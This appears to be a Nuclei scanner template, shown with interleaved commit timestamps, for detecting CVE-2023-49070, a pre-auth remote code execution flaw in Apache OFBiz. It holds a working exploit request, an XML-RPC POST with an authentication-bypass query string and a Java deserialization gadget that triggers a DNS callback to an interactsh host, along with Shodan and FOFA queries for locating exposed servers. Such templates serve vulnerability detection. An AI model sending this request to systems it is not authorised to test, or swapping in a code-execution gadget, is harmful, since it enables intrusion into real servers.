2023-12-06 05:56:13 +00:00
|
|
|
id: CVE-2023-49070
|
|
|
|
|
|
|
|
info:
|
2023-12-06 06:24:26 +00:00
|
|
|
name: Apache OFBiz < 18.12.10 - Arbitrary Code Execution
|
2023-12-06 05:56:13 +00:00
|
|
|
author: your3cho
|
|
|
|
severity: critical
|
|
|
|
description: |
|
2023-12-06 06:24:26 +00:00
|
|
|
Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.
|
|
|
|
remediation: Users are recommended to upgrade to version 18.12.10.
|
2023-12-06 05:56:13 +00:00
|
|
|
reference:
|
|
|
|
- https://lists.apache.org/thread/jmbqk2lp4t4483whzndp5xqlq4f3otg3
|
|
|
|
- https://seclists.org/oss-sec/2023/q4/257
|
|
|
|
- https://twitter.com/Siebene7/status/1731870759130427726
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-49070
|
2023-12-12 11:07:52 +00:00
|
|
|
- https://issues.apache.org/jira/browse/OFBIZ-12812
|
2023-12-06 06:24:26 +00:00
|
|
|
classification:
|
2023-12-12 11:07:52 +00:00
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
2023-12-06 06:24:26 +00:00
|
|
|
cvss-score: 9.8
|
|
|
|
cve-id: CVE-2023-49070
|
|
|
|
cwe-id: CWE-94
|
2024-05-31 19:23:20 +00:00
|
|
|
epss-score: 0.79399
|
|
|
|
epss-percentile: 0.98282
|
2023-12-12 11:07:52 +00:00
|
|
|
cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
|
2023-12-06 05:56:13 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
|
|
|
vendor: apache
|
|
|
|
product: ofbiz
|
2023-12-06 06:24:26 +00:00
|
|
|
shodan-query: html:"OFBiz"
|
2023-12-12 11:07:52 +00:00
|
|
|
fofa-query: app="Apache_OFBiz"
|
2024-01-14 09:21:50 +00:00
|
|
|
tags: cve,cve2023,seclists,apache,ofbiz,deserialization,rce
|
2023-12-06 05:56:13 +00:00
|
|
|
|
|
|
|
http:
|
|
|
|
- raw:
|
|
|
|
- |
|
2023-12-06 06:42:48 +00:00
|
|
|
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
|
2023-12-06 05:56:13 +00:00
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/xml
|
|
|
|
|
|
|
|
<?xml version="1.0"?>
|
|
|
|
<methodCall>
|
|
|
|
<methodName>{{randstr}}</methodName>
|
|
|
|
<params>
|
|
|
|
<param>
|
|
|
|
<value>
|
|
|
|
<struct>
|
|
|
|
<member>
|
|
|
|
<name>test</name>
|
|
|
|
<value>
|
|
|
|
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">{{generate_java_gadget("dns", "http://{{interactsh-url}}", "base64")}}</serializable>
|
|
|
|
</value>
|
|
|
|
</member>
|
|
|
|
</struct>
|
|
|
|
</value>
|
|
|
|
</param>
|
|
|
|
</params>
|
|
|
|
</methodCall>
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: interactsh_protocol
|
|
|
|
words:
|
|
|
|
- "dns"
|
2023-12-06 06:26:59 +00:00
|
|
|
|
2023-12-06 05:56:13 +00:00
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- '<name>faultString</name>'
|
2024-06-01 06:53:00 +00:00
|
|
|
# digest: 4a0a00473045022100cffd4ad024f079fedf1e77fb9ec9f09eae4496a27a8a6732e46740402a17f7e4022025665fe685dae977b34841487c70fb9a0e25f9c5c81c78eab968913221e623f0:922c64590222798bb761d5b6d8e72950
|